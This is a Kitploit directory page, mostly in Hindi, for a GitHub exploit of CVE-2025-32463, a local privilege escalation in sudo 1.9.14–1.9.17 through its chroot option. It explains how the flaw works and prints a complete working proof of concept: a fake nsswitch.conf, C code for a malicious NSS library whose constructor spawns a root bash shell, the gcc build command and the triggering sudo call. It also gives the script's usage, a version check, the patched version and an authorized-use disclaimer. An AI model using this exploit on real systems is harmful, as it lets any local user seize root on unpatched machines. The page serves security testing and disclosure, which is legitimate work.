Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32463_exploit — sudo 1.9.14-1.9.17 के लिए स्थानीय विशेषाधिकार वृद्धि शोषण, जो CVE-2025-32463 chroot हैंडलिंग का दुरुपयोग करता है, किसी भी स्थानीय उपयोगकर्ता के लिए रूट शेल उत्पन्न करने हेतु दुर्भावनापूर्ण NSS लाइब्रेरी कंस्ट्रक्टर स्थापित करता है। | Kitploit
उपकरण/GitHubGitHub/0xdak/cve-2025-32463_exploit
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेलोड डेवलपमेंट
GitHub0xdak/cve-2025-32463_exploit

CVE-2025-32463_exploit

sudo 1.9.14-1.9.17 के लिए स्थानीय विशेषाधिकार वृद्धि शोषण, जो CVE-2025-32463 chroot हैंडलिंग का दुरुपयोग करता है, किसी भी स्थानीय उपयोगकर्ता के लिए रूट शेल उत्पन्न करने हेतु दुर्भावनापूर्ण NSS लाइब्रेरी कंस्ट्रक्टर स्थापित करता है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
17 दिन पहलेअभी तक समीक्षित नहीं

CVE-2025-32463 — sudo "chwoot" chroot स्थानीय विशेषाधिकार वृद्धि

sudo में --chroot (-R) विकल्प के माध्यम से root तक स्थानीय विशेषाधिकार वृद्धि। यह किसी भी स्थानीय उपयोगकर्ता के लिए काम करता है, जिसमें ऐसे खाते भी शामिल हैं जिनके पास बिल्कुल भी sudoers प्रविष्टि नहीं है (जैसे www-data)।

sudo 1.9.14 – 1.9.17 उपयोगकर्ता द्वारा दी गई निर्देशिका में chroot() करता है जबकि sudoers नीति का मूल्यांकन अभी भी किया जा रहा है — अर्थात प्राधिकरण निर्णय से पहले। उस chroot() के बाद, sudo की NSS लुकअप हमलावर के chroot के अंदर से /etc/nsswitch.conf पढ़ती हैं, और glibc एक नकली स्रोत नाम को dlopen("libnss_<name>.so.2") में बदल देता है — जो लोड होता है और उसका कंस्ट्रक्टर root के रूप में निष्पादित होता है।

नकली nsswitch.conf (passwd: /woot1337) के साथ एक दुर्भावनापूर्ण libnss_/woot1337.so.2 रखने पर, जिसका ELF कंस्ट्रक्टर setreuid(0) + exec("/bin/bash") करता है, एक root शेल प्राप्त होता है। यह एक्सप्ल्वाइट sudoers जाँच से पहले सक्रिय हो जाता है, इसलिए चलाने वाले को sudo विशेषाधिकारों की आवश्यकता नहीं होती।

  • प्रभावित: sudo 1.9.14 – 1.9.17
  • समाधान: 1.9.17p1 (1.9.14 का chroot परिवर्तन वापस ले लिया गया; यह सुविधा अप्रचलित कर दी गई)
  • CWE: 829 (अविश्वसनीय नियंत्रण क्षेत्र से कार्यक्षमता का समावेश)
  • प्रभाव: कोई भी स्थानीय उपयोगकर्ता → root. नियतात्मक लॉजिक बग (कोई मेमोरी करप्शन नहीं, कोई ब्रूट फोर्स नहीं)।
  • Rich Mirch (Stratascale) द्वारा खुलासा, 2025।

आवश्यकताएँ

Python 3 मानक पुस्तकालय, लक्ष्य पर एक असुरक्षित setuid sudo (1.9.14–1.9.17), और gcc (छोटे libnss मॉड्यूल को बनाने के लिए)। इसे कम-विशेषाधिकार वाले उपयोगकर्ता के रूप में चलाएँ।

उपयोग

root@kitploit:~
python3 exploit.py            # -> interactive root shell
python3 exploit.py -c 'id'    # run a single command as root

यह कैसे काम करता है

  1. एक chroot निर्देशिका तैयार करें जिसमें etc/nsswitch.conf = passwd: /woot1337 हो (+ /etc/group की एक प्रति)।
  2. libnss_/woot1337.so.2 संकलित करें — एक ELF जिसका कंस्ट्रक्टर (__attribute__((constructor))) setreuid(0,0) और execl("/bin/bash", …) करता है।
  3. sudo -R woot woot — sudo woot में chroot करता है, NSS को हल करता है, libnss_/woot1337.so.2 को root के रूप में dlopen करता है, और कंस्ट्रक्टर एक root शेल देता है — इससे पहले कि sudo कभी यह जाँचे कि उपयोगकर्ता अधिकृत है या नहीं।

प्रामाणिक मैनुअल PoC (Stratascale / pr0v3rbs "chwoot"):

root@kitploit:~
cd $(mktemp -d); mkdir -p woot/etc libnss_
echo 'passwd: /woot1337' > woot/etc/nsswitch.conf; cp /etc/group woot/etc
cat > w.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void){setreuid(0,0);setregid(0,0);chdir("/");execl("/bin/bash","/bin/bash","-p",NULL);}
EOF
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 w.c
sudo -R woot woot        # -> root

लक्ष्य की जाँच करना

root@kitploit:~
sudo --version | head -1   # "Sudo version 1.9.14" .. "1.9.17" => vulnerable ; 1.9.17p1 => patched

निवारण

sudo को ≥ 1.9.17p1 पर अपडेट करें। chroot सुविधा अप्रचलित है और इस पर भरोसा नहीं किया जाना चाहिए।

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। इसका उपयोग केवल उन्हीं सिस्टमों के विरुद्ध करें जिनके आप स्वामी हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।

टूल डाउनलोड करें